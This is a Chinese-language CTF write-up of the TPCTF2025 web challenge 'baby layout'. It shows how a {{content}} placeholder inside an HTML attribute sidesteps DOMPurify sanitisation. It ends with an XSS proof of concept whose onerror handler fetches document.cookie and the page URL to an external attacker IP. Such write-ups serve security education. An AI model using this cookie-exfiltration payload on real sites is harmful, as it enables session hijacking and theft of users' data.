TPCTF2025

WEB

baby layout

一道xss题目，一个界面输入xss一个界面访问

layout是你的模版,content占位上面的输入框
源代码中

app.post('/api/layout', (req, res) => {
  const { layout } = req.body;
  if (typeof layout !== 'string') return res.status(400).send('Invalid param');
  if (layout.length > LENGTH_LIMIT) return res.status(400).send('Layout too large');

  const sanitizedLayout = DOMPurify.sanitize(layout);

  const id = req.session.layouts.length;
  req.session.layouts.push(sanitizedLayout);
  return res.json({ id });
});

使用了DOMPurify进行过滤，测试网站https://cure53.de/purify
我们输入的script，onerror，onload均被过滤
很明显外部库很难绕过
所以出题人给了我们{{content}}可以闭合引号，自己创造一个onerror标签

就像这样：

Layout：

<img
  src="{{content}}"
/>

Post:

ccc" onerror="javascript:alert(1)

代码成功执行

poc：

aaaaaaaa" onerror="fetch('http://47.237.137.xxx:7777?' + 
    encodeURIComponent(
      'cookie=' + document.cookie + 
      '&url=' + location.href
    )
  )